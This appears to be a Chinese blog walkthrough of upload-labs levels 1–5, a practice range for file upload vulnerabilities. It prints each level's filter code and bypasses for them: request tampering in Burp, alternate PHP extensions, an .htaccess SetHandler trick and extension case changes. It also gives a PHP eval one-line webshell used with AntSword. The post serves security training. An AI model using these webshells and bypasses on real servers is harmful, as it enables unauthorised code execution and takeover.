upload_labs闯关

最新推荐文章于 2024-04-14 15:49:21 发布
最新推荐文章于 2024-04-14 15:49:21 发布
阅读量215 收藏
点赞数
分类专栏: 安全学习 # web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45951598/article/details/109317185
版权

在这里插入图片描述
upload

文章目录

Pass-1-js检查

源码:

function checkFile() {
    var file = document.getElementsByName('upload_file')[0].value;
    if (file == null || file == "") {
        alert("请选择要上传的文件!");
        return false;
    }
    //定义允许上传的文件类型
    var allow_ext = ".jpg|.png|.gif";
    //提取上传文件的类型
    var ext_name = file.substring(file.lastIndexOf("."));
    //判断上传文件类型是否允许上传
    if (allow_ext.indexOf(ext_name + "|") == -1) {
        var errMsg = "该文件不允许上传,请上传" + allow_ext + "类型的文件,当前文件类型为:" + ext_name;
        alert(errMsg);
        return false;
    }
}

1、原理:客户端(前端js验证文件是否正确)验证,或者直接抓包,重放绕过。

然后我们可以创建一个文本文件写入一句话木马,然后把里面内容写成是一句话木马,再把文件名修改一下。

<?php eval($_POST['a']); ?>

然后上传文件,用burp修改一下后缀名为php,上传过去用蚂蚁剑连接一下就可以了。

Pass-2-只验证Content-type

在这里插入图片描述

原理:

1、mime:多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型(规定了扩展名)

2、可以用第一关的方式绕过

3、原理:其content-type(mime)是由客户端根据你上传的文件生成的,但限制只能是jpg/image格式,所以抓包改就好了

也可以抓一个正确的包,修改器白名单限制类型

在这里插入图片描述改mime为image/jpeg

Pass-3-黑名单绕过

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

用黑名单不允许上传.asp,.aspx,.php,.jsp后缀的文件
但可以上传.phtml .phps .php5 .pht
前提是apache的httpd.conf中有如下配置代码

AddType application/x-httpd-php .php .phtml .phps .php5 .pht

因此抓包修改为1.php5上传,回复包里有上传路径

Pass-4-.htaccess绕过

源码:

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

虽然还是黑名单,但几乎过滤了所有有问题的后缀名,除了.htaccess,于是首先上传一个.htaccess内容如下的文件:

<FilesMatch "shell.jpg"> 
	SetHandler application/x-httpd-php 
</FilesMatch>

使得服务器将所有.jpg后缀的文件当做php文件解析。
上传一个.htaccess
在这里插入图片描述
上传一个shell.jpg
在这里插入图片描述
这里看一下图片位置
在这里插入图片描述

蚂蚁剑连接
在这里插入图片描述

Pass-5-大小写绕过

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

查看源代码可知,这里没有把所有转换小写,所以可以试一下把文件大写一下。
在这里插入图片描述

multi4
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Upload-labs
a765880053的博客
03-05 168
Pass-01: 代码: function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.png|.gif";
upload.docx
05-07
学习交流
upload-labs
omh164052427的博客
02-24 285
本篇为upload,直到做完 pass-01 可以发现是一个前端验证,我们直接右键检查,删掉代码 然后上传文件,成功 pass-02 这一是常见验证中文件类型验证,也是MIME信息 我们使用Burpsuite工具进行抓包, 然后修改上面的文件类型 之后上传,成功 pass-03 是一个黑名单验证卡,但是黑名单定义不完整是可以实现绕过的,所以我们可以上传一个后缀为.php5的文件 上传成功 (注意:需要将ap...
安装upload-labs
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
upload-labs通手册
12-03
详细记录了upload-labs靶场的通步骤,并且附带有caidao和burpsuite工具资源,非常适合初学者!!!
上传文件漏洞靶场upload-labs
09-27
总的来说,`upload-labs`靶场提供了一个理想的环境,让你在安全的环境中实践和掌握上传文件漏洞相的知识,这对于提升你的Web安全技能至重要。通过深入研究和实践,你将能够更好地保护自己和他人的网站免受此类...
UPLOAD-LABS详细解题步骤
05-17
UPLOAD-LABS详细解题步骤 UPLOAD-LABS是一个网络安全靶场,旨在帮助用户练习文件上传的安全知识。该靶场提供了多个卡,每个卡都有一定的安全挑战和限制,旨在考验用户的安全知识和技术。 在开始之前,需要先...
upload-labs-master.zip
06-22
【描述】描述中的 "文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master" 显示这是一个针对文件上传漏洞的系列练习,通过多次嵌套的目录结构,可能旨在模拟不同...
上传漏洞学习——upload-labs (一)
未完成的歌~的博客
08-08 2498
Less 1—10 写的很详细!╰( ̄ω ̄o) 后面的会继续更新。
upload1-21
qq_43709121的博客
05-07 301
UPLOAD1-21 环境:windows php5.2.17 apache2.4.23 01: 分析:前端过滤,只允许上传jpg\png\gif文件 上传:准备一张图片,编辑器打开,在末尾多写入几句<?php phpinfo();?>,然后上传,抓包,将文件修改为.php文件,上传成功后访问即可 02: 分析:代码对文件的content-type进行了验证,并且按原文件名上传到服务器 上传:准备一张图片,编辑器打开,在末尾多写入几句<?php phpinfo();?>,然
上传漏洞学习——upload-labs (二)
未完成的歌~的博客
08-14 549
接着上篇的总结 (= ̄ω ̄=) Less-11—20
【渗透测试】--- upload-labs(1-19)
qq_43168364的博客
08-22 758
第一 1、检测方式 JS代码前端检测 2、绕过方式 Fn+F12删除前端代码的事件 3、具体步骤 上传.php文件之后给我们提示 由此猜测可能是用了js前端代码的验证,我们查看它的前端代码 这里果然有一个事件,我们将该事件删除,即可上传bug.php文件 上传解析成功 4、源码分析 第二 1、检测方式 服务器端MIME类型检测 2、绕过方式 将我们的木马文件改名为xxx.jpg,开启bp拦截,点击上传,这样我们MIME类型就是图片的了,然后该文件名为xxx.php即可 3、具体步骤 上传重命
文件上传之upload-labs—白盒审计
good good study
02-15 1368
先补充前置知识 $_FILES PHP 的全局数组 $_FILES,通过其我们可以向服务器上传文件。全局意味着我们可以在任何位置访问到这个变量 1. 建立一个 form.html 演示上传文件,其中的代码如下: <html> <head></head> <body></body> <form enctype="multipart/form-data" action="upload_file.php" method="POST"...
文件上传及upload-labs
anananan145的博客
07-15 2918
文件上传
upload靶场通(1-21
最新发布
ki_nsey的博客
04-14 1178
upload靶场通记录,欢迎各位小伙伴们参考
Upload-labs 1-20靶场通攻略(全网最全最完整)
dragon的博客
03-15 4110
在github上找upload-labs-0.1环境,部署在小皮面板上也可以直接下载他的集成的环境。 Sethandler将该目录及子目录的所有文件均映射为php文件类型。 Addhandler使用 php5-script 处理器来解析所匹配到的文件。 AddType将特定扩展名文件映射为php文件类型。 简单来说就是,可以将我们所的文件都解析成php或者是特定的文件解析为php 当 PHP 在处理文件名或路径时,如果遇到 URL 编码的 %00,它会被解释为一个空字节(ASCII 值为 0)
upload _labs 通
gclome的博客
07-08 498
第11 源码如下: 现在上传一张图片,并用burp suite抓包,然后send to repeater,使用00截断 00截断条件: 1.php<5.3.4,5.3.4及以上已修复。 2.magic_quotes_gpc off。 我们可以在右边看见上传成功 访问地址,上传成功 第12 源码如下: 现在上传一张图片,并用burp suite抓包,然后send to repeater ...
upload_labs 图片
07-29
如果移动成功,则设置`$is_upload`为`true`。如果移动失败,则设置`$msg`为"上传出错!"。如果文件类型不正确,则设置`$msg`为"文件类型不正确,请重新上传!"。如果文件夹不存在,则设置`$msg`为"文件夹不存在,请...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值